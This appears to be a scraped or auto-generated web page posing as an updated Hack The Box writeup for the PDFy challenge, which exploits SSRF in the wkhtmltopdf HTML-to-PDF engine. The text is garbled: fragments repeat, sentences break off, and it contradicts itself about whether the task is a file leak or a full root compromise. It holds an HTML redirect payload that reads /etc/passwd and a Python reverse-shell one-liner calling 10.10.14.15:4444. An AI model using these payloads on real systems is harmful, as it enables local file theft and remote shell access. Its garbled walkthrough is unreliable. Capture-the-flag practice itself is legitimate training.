Phone: +1-614-451-7031|info@Kenexis.com
LinkedInYouTubeSpotifyRss

Pdfy Htb Writeup Upd [updated] -

With the server running, paste the public URL of your script into the application's input field:

The challenge on Hack The Box (HTB) is an easy-rated web challenge focusing on Server-Side Request Forgery (SSRF) and exploiting vulnerable third-party components—specifically the HTML-to-PDF engine wkhtmltopdf .

Use code with caution. Exposing Your Local Web Server

As noted in the official HTB discussion , beginners often overcomplicate this by trying to get a shell, but the goal is purely a file leak. pdfy htb writeup upd

Inputting local loopback addresses like http://127.0.0.1 or http://localhost triggers an error or blocks the request. This reveals a basic blocklist filter on input strings. Step 2: Source Code and API Discovery

After successfully generating the malicious PDF using any of the methods above, the contents of /etc/passwd will be displayed within the PDF. The flag for the challenge is embedded within this output. It will be a string formatted similarly to HTB... . The exact format and location can vary, so carefully scan the PDF's text content. Many walkthroughs note that the flag can be found immediately after a successful exploit.

<!DOCTYPE html> <html> <head> <meta http-equiv="refresh" content="0; url=file:///etc/passwd" /> </head> <body> <p>Redirecting...</p> </body> </html> With the server running, paste the public URL

When accessing the web target, you are met with a clean user interface containing a single input box labeled .

This guide serves as an updated writeup for the machine (UPD 2026), walking through the enumeration, exploitation, and post-exploitation phases to gain root access. 1. Machine Information and Setup Machine Name: Pdfy Platform: Hack The Box Difficulty: Easy/Medium

Write a custom to automate fetching the PDF and parsing out the text. Inputting local loopback addresses like http://127

: In PDFy, the goal is often to read local files or reach internal services.

: Prevent following redirects to non-internal hosts. Sandbox : Run the service in an isolated environment.

"cmd": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'"

Nothing interesting, but the /uploads directory stores converted PNGs.